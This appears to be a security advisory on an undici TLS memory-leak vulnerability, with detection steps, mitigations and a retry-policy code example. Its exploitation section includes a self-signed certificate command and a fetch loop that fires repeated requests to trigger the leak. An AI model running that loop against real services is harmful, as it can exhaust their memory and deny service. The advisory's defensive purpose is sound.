How the CVE Works
The vulnerability in undici (Node.js HTTP client) arises when handling invalid TLS certificates during repeated webhook requests. When undici attempts to connect to a malicious server with a malformed certificate, it fails to properly release memory allocated during TLS handshake processing. Each failed connection attempt leaks memory, and if an attacker forces repeated requests (e.g., via retry logic), this leads to uncontrolled memory consumption. The issue affects undici versions <5.29.0, 6.0.0 to 6.21.2, and 7.0.0 to 7.5.0.
DailyCVE Form
Platform: Node.js (undici)
Version: <5.29.0, 6.0.0–6.21.2, 7.0.0–7.5.0
Vulnerability: Memory leak via TLS
Severity: Critical
Date: May 15, 2025
What Undercode Say:
Exploitation
1. Malicious Server Setup:
openssl req -x509 -newkey rsa:2048 -keyout bad.key -out bad.crt -days 365 -nodes -subj "/CN=attacker.local"
Host a server with this invalid cert to trigger undici's TLS error handling.
2. Force Webhook Retries:
const { fetch } = require('undici');
// Every request fails certificate validation; without a rejection handler the
// first failure would end the process as an unhandled promise rejection.
setInterval(() => fetch('https://attacker.local/webhook').catch(() => {}), 100);
Detection
Check for memory growth in Node.js:
node --inspect -e "require('undici').fetch('https://invalid-cert-server').catch(() => console.log(process.memoryUsage()))"
Monitor heap usage via Chrome DevTools or `process.memoryUsage()`; a heap that keeps growing across repeated failed requests, rather than settling after garbage collection, is the signature of the leak.
Mitigation
1. Patch Immediately:
npm update undici --save
2. Workaround: Implement retry limits:
const { fetch } = require('undici');
const MAX_RETRIES = 3;
// The retry count is passed per call; a single module-wide counter would
// never reset and would stop all retries after the first three failures.
async function safeFetch(url, retries = 0) {
  try {
    return await fetch(url);
  } catch (err) {
    if (retries + 1 >= MAX_RETRIES) throw err;
    return safeFetch(url, retries + 1);
  }
}
3. TLS Validation: Enforce strict certificate checks:
const { Agent, setGlobalDispatcher } = require('undici');
// rejectUnauthorized is already Node's TLS default; setting it explicitly
// guards against code elsewhere turning it off. The same TLS options can
// also be passed under undici's `connect` option.
const agent = new Agent({ tls: { rejectUnauthorized: true } });
setGlobalDispatcher(agent);
4. Monitoring: Use `--max-old-space-size` to cap memory (this bounds the heap so a leaking process fails fast and can be restarted by a supervisor; it does not stop the leak itself):
node --max-old-space-size=4096 app.js
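As an added example (not undici's code and not from the original advisory), here is a fuller form of the retry-limit workaround in item 2: the retry budget is per call, backs off exponentially, and never retries a certificate-validation failure, since each such retry re-runs the leaking handshake described under Exploitation. The error codes are Node/OpenSSL's; the `fetchImpl` and `sleep` hooks and the webhook URL are constructed so the policy can be exercised offline.

```javascript
// Added example, not undici's code: a webhook sender whose retry policy treats
// a failed certificate check as permanent, since every retry against such a
// server repeats the leaking TLS handshake. The retry budget is per call.
// Node/OpenSSL codes reported when the peer certificate is untrusted.
const CERT_ERROR_CODES = new Set([
  'DEPTH_ZERO_SELF_SIGNED_CERT', 'SELF_SIGNED_CERT_IN_CHAIN', 'CERT_HAS_EXPIRED',
  'UNABLE_TO_VERIFY_LEAF_SIGNATURE', 'ERR_TLS_CERT_ALTNAME_INVALID',
]);
// Transient network failures that a later attempt may recover from.
const TRANSIENT_CODES = new Set(['ECONNRESET', 'ECONNREFUSED', 'ETIMEDOUT', 'UND_ERR_CONNECT_TIMEOUT']);
// undici's fetch rejects with TypeError('fetch failed') and keeps the socket
// error in `cause`; read the code from there when present.
function errorCode(err) {
  const inner = err && err.cause ? err.cause : err;
  return inner && inner.code ? String(inner.code) : '';
}
// Only 'transient' errors are retried; certificate and unknown errors are
// 'permanent', so a bad certificate is reported after a single attempt.
function classifyError(err) {
  const code = errorCode(err);
  if (CERT_ERROR_CODES.has(code)) return 'permanent';
  return TRANSIENT_CODES.has(code) ? 'transient' : 'permanent';
}
// Exponential backoff: base, 2*base, 4*base, ... capped at maxDelayMs.
function retryDelayMs(attempt, baseDelayMs = 200, maxDelayMs = 5000) {
  return Math.min(maxDelayMs, baseDelayMs * 2 ** attempt);
}

// fetchImpl and sleep are injectable so the policy can run without a network;
// by default the real undici fetch and a timer-based sleep are used.
async function sendWebhook(url, body, opts = {}) {
  const { maxRetries = 3, sleep = ms => new Promise(r => setTimeout(r, ms)) } = opts;
  const fetchImpl = opts.fetchImpl || require('undici').fetch;
  for (let attempt = 0; ; attempt++) {
    let res;
    try {
      res = await fetchImpl(url, { method: 'POST', body });
    } catch (err) {
      if (classifyError(err) === 'permanent' || attempt >= maxRetries) {
        throw Object.assign(err, { attempts: attempt + 1 });
      }
      await sleep(retryDelayMs(attempt));
      continue;
    }
    // A 5xx answer is retried like a transient error; anything else is final.
    if (res.status < 500 || attempt >= maxRetries) return { status: res.status, attempts: attempt + 1 };
    await sleep(retryDelayMs(attempt));
  }
}
```

The rejected promise carries an `attempts` property, so a caller can log how many dials a delivery cost and alert when certificate failures are being reported against a webhook target.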